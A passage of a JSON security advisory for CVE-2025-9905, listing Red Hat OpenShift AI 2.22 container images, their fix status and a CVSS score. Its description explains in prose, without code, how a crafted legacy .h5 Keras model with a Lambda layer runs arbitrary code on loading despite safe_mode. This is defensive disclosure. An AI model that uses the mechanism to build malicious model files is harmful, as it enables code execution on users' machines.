"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2396645"
}
],
"notes": [
{
"category": "description",
"text": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Arbitary Code execution in Keras load_model()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "RHBZ#2396645",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396645"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9905"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21602",
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
}
],
"release_date": "2025-09-19T08:16:44.772000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
